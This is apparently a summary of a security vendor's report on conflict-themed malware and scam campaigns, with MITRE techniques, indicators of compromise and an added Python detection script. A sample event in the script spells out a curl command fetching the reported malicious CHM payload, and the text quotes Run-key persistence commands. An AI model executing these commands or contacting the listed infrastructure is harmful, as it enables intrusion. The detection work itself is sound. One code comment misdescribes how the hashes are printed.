Middle East Conflict Fuels Opportunistic Cyber Attacks

Zscaler ThreatLabz documented a surge of Middle East conflict-themed campaigns that include fake news blogs, fraudulent portals and storefronts, donation scams, meme-coin pump-and-dump promotions, and multiple malware delivery chains leveraging LNK/CHM, DLL sideloading, and in-memory shellcode. Notable detections include Mustang Panda using a LOTUSLITE chain via libmemobook.dll and KuGou sideloading, and web-based lures delivering StealC. #LOTUSLITE #StealC

Keypoints

  • ThreatLabz identified over 8,000 newly registered conflict-themed domains, many currently inactive but potentially weaponizable for future campaigns.
  • A targeted GCC-region attack used a ZIP with an LNK that downloaded a malicious CHM, which extracted a shellcode loader and a decoy PDF about missile strikes to lure victims.
  • Mustang Panda distributed the LOTUSLITE backdoor via DLL sideloading: a renamed legitimate KuGou executable sideloaded libmemobook.dll which deployed LOTUSLITE components and used C2 172.81.60[.]97.
  • Fake news blogs and file-hosting pages delivered StealC in password-protected ZIPs, with malicious JavaScript detecting device type to tailor redirects.
  • Multiple phishing and scam sites impersonated legitimate services (e.g., a fake SSA portal and an Israeli toll-payment site), collected victim data, and in some cases forwarded submissions to a Telegram bot.
  • Conflict-themed donation and storefront sites routed payments to suspicious GPay identifiers or cryptocurrency addresses, and meme-coin promotions showed pump-and-dump behavior.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The campaign used a Windows LNK file to initiate the attack and download a CHM payload; URLs are shown defanged (‘The ZIP archive contains an LNK file named photo_2026-03-01_01-20-48.pdf.lnk. The LNK’s target command line uses cURL to download a malicious CHM file from hxxps://www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png.’)
  • [T1105] Ingress Tool Transfer – Next-stage payloads and archives were downloaded from attacker-controlled or compromised web locations (‘The LNK’s target command line uses cURL to download a malicious CHM file from hxxps://www.360printsol[.]com/…’; the shellcode also fetched KApp.rar/KAppl.rar from www.e-kflower[.]com)
  • [T1574.002] DLL Side-Loading – Legitimate host binaries (ShellFolder.exe, WebFeatures.exe/SafeChrome.exe) were used to sideload malicious DLLs (ShellFolderDepend.dll, kugou.dll) (‘ShellFolder.exe uses DLL sideloading to load a malicious DLL named ShellFolderDepend.dll.’)
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence was established by creating Run keys via reg.exe or RegSetValueExA to launch the installed components (‘reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run … BaiNetdisk’ and ‘The downloader creates a Windows Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ACboardC and sets it to: C:ProgramDataCClipboardCmSafeChrome.exe.’)
  • [T1027] Obfuscated Files or Information – Use of encrypted and highly obfuscated shellcode and embedded encrypted payloads to hide malicious functionality (‘shellcode loader, a highly obfuscated shellcode, and eventually a backdoor.’ and ‘The DLL calls the Windows Native API SystemFunction033 (RC4) to decrypt shellcode stored in Shelter.ex’)
  • [T1071.001] Application Layer Protocol – HTTP(S) used for C2 and payload retrieval, with traffic blending in via a hardcoded User-Agent and a fixed C2 IP (‘The shellcode hardcodes the User-Agent … to mimic legitimate Chrome browser activity.’ and ‘use of the same C2 IP address: 172.81.60[.]97.’)
  • [T1566] Phishing – Fraudulent replica sites and fake payment/portal pages used to collect credentials and trick victims into installing remote-management software (‘cfgomma[.]com hosted a fraudulent replica of the US Social Security Administration (SSA) portal’ and a fake Kvish 6 toll site that collected payment details)
  • [T1567] Exfiltration Over Web Service – Collected victim-submitted data was forwarded to a third-party web service (a Telegram bot) for attacker retrieval (‘The submitted data is forwarded to a Telegram bot.’)
  • [T1059.003] Command and Scripting Interpreter (Windows Command Shell) – Use of shell commands (cURL invocation via LNK) to retrieve remote payloads (‘The LNK’s target command line uses cURL to download a malicious CHM file…’)

Indicators of Compromise

  • [Domains] conflict-themed lures and payload hosts – www.360printsol[.]com (CHM hosting/download), e-kflower[.]com (staging payloads), and dozens of newly registered conflict-themed domains such as nowarwithiran[.]store, irandonation[.]org, goldman-iran-krieg[.]pages[.]dev
  • [Redirecting domains] redirectors used in web campaigns – flourishingscreencousin[.]com, Holidayslettucecircumvent[.]com
  • [File names] malicious and decoy filenames observed – photo_2026-03-01_01-20-48.pdf.lnk (initial LNK), ShellFolderDepend.dll (malicious DLL sideloaded), Iran Strikes U.S. Military Facilities Across Gulf Region.exe (renamed legitimate host), and Shelter.ex (embedded encrypted shellcode)
  • [File hashes] observed payload hashes (MD5 / SHA1 / SHA256) – libmemobook.dll: 6accd57e48c34cadc998d00594229e42 / be34901237c9fa9563e8dc9e71faf3a7e68f983f / 4fb9b5d115bceee45a89447fb2565faef07452cda6b8e244e53ad91499c3d9b5; kugou.dll: 10fb1122079b5ae8e4147253a937f40f / 7d4e31c8b11be7c970860c4fbc8fe85c70724cb1 / 8564763407064117726211ff8f89555e5a3b2b70bc9667032abd69cbe53b5216 (and other hashes reported)
  • [IP addresses] command-and-control – 172.81.60[.]97 (LOTUSLITE C2)
  • [URLs] specific payload URLs observed – hxxps://www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png (CHM download), www.e-kflower[.]com/_prozn/_skin_mbl/home/KApp.rar and /KAppl.rar (staged payloads)
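The following is an added example, not code from Zscaler ThreatLabz or from this summary. It turns the MITRE Techniques list and the Indicators of Compromise list above into something a defender can run: the defanged indicators are normalised (hxxps:// and [.] undone, the run-together MD5+SHA1+SHA256 strings split back into three digests by length), and one detection rule per technique is applied to a handful of constructed telemetry events. The event field names (type, image, parent, cmdline, key, value, dll, host, dst_ip, hash) and the sample events are assumptions made for the example; the indicator values are the ones printed in the summary.

```python
"""Added example, not code from Zscaler ThreatLabz or from the summary above.
Normalises the defanged indicators listed in the MITRE Techniques and Indicators
of Compromise sections and runs one detection rule per technique over a few
constructed telemetry events. The event shape (type, image, parent, cmdline,
key, value, dll, host, dst_ip, hash) is an assumption for this example."""
import re

# --- 1. Indicator normalisation ---------------------------------------------

def refang(ioc: str) -> str:
    """Undo defanging (hxxps:// and [.]) so a value can be compared with real telemetry."""
    s = re.sub(r"^hxxp(s?)://", r"http\1://", ioc.strip(), flags=re.IGNORECASE)
    return s.replace("[.]", ".").lower()

DIGEST_LENGTHS = (("md5", 32), ("sha1", 40), ("sha256", 64))

def split_concatenated_digests(blob: str) -> dict:
    """The summary prints MD5+SHA1+SHA256 of each file run together as one
    136-character string; split it back into three digests by length."""
    blob = blob.strip()
    if not re.fullmatch(r"[0-9a-fA-F]{136}", blob):
        raise ValueError("expected 136 hex characters (md5+sha1+sha256)")
    out, pos = {}, 0
    for name, length in DIGEST_LENGTHS:
        out[name] = blob[pos:pos + length].lower()   # hex is case-insensitive
        pos += length
    return out

# Indicators exactly as printed in the summary (defanged), normalised once.
IOC_DOMAINS = {refang(d) for d in (
    "www.360printsol[.]com", "e-kflower[.]com", "www.e-kflower[.]com",
    "nowarwithiran[.]store", "irandonation[.]org", "goldman-iran-krieg[.]pages[.]dev",
    "flourishingscreencousin[.]com", "Holidayslettucecircumvent[.]com")}
IOC_IPS = {refang("172.81.60[.]97")}
IOC_DLLS = {"libmemobook.dll", "kugou.dll", "shellfolderdepend.dll"}
IOC_RUN_VALUES = {"acboardc", "bainetdisk"}          # Run key value names from the report
IOC_HASHES = set()
for _blob in (
    "6accd57e48c34cadc998d00594229e42Be34901237c9fa9563e8dc9e71faf3a7e68f983f4fb9b5d115bceee45a89447fb2565faef07452cda6b8e244e53ad91499c3d9b5",  # libmemobook.dll
    "10fb1122079b5ae8e4147253a937f40f7d4e31c8b11be7c970860c4fbc8fe85c70724cb18564763407064117726211ff8f89555e5a3b2b70bc9667032abd69cbe53b5216",  # kugou.dll
):
    IOC_HASHES.update(split_concatenated_digests(_blob).values())

RUN_KEY_RE = re.compile(r"^HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run$", re.IGNORECASE)
URL_HOST_RE = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)

# --- 2. One rule per technique in the summary --------------------------------

def check_event(ev: dict) -> list:
    """Return the rule names that fire for a single event (empty list if none)."""
    hits, kind = [], ev.get("type")
    if kind == "process":
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        hosts = {h.lower() for h in URL_HOST_RE.findall(ev.get("cmdline", ""))}
        if hosts & IOC_DOMAINS:
            hits.append("T1105 download from reported payload host")
        # Assumption: a double-clicked LNK whose target is cURL shows up as curl.exe
        # spawned directly by explorer.exe with a URL on its command line.
        if image.endswith("curl.exe") and parent.endswith("explorer.exe") and hosts:
            hits.append("T1204.002 user-launched cURL with remote URL")
    elif kind == "registry":
        if RUN_KEY_RE.match(ev.get("key", "")) and ev.get("value", "").lower() in IOC_RUN_VALUES:
            hits.append("T1547.001 Run key value named in report")
    elif kind == "image_load":
        if ev.get("dll", "").lower().rsplit("\\", 1)[-1] in IOC_DLLS:
            hits.append("T1574.002 sideloaded DLL named in report")
    elif kind == "network":
        if ev.get("host", "").lower() in IOC_DOMAINS or ev.get("dst_ip") in IOC_IPS:
            hits.append("T1071.001 traffic to reported C2/payload infrastructure")
    elif kind == "file":
        if ev.get("hash", "").lower() in IOC_HASHES:
            hits.append("file hash listed in report")
    return hits

def scan(events) -> list:
    """Run every event through check_event; returns (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]

# Constructed sample telemetry (not from the report); the last two events are benign.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "curl.exe -s https://www.360printsol.com/2026/alfadhalah/thumbnail?img=index.png -o t.chm"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "ACboardC", "data": r"C:\ProgramData\example\SafeChrome.exe"},   # path is constructed
    {"type": "image_load", "image": r"C:\Users\u\Downloads\renamed-kugou.exe",
     "dll": r"C:\Users\u\Downloads\libmemobook.dll"},
    {"type": "network", "host": "", "dst_ip": "172.81.60.97"},
    {"type": "file", "path": r"C:\Users\u\Downloads\kugou.dll", "hash": "10FB1122079B5AE8E4147253A937F40F"},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "curl.exe https://example.org/robots.txt"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The exact-match rules (domains, IP, DLL names, Run value names, hashes) only catch the samples this report describes; the one heuristic rule, curl.exe spawned directly by explorer.exe with a URL argument, is the piece that generalises to the next LNK-to-cURL chain, and it is also the one to tune against your own baseline before alerting on it.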

Read more: https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks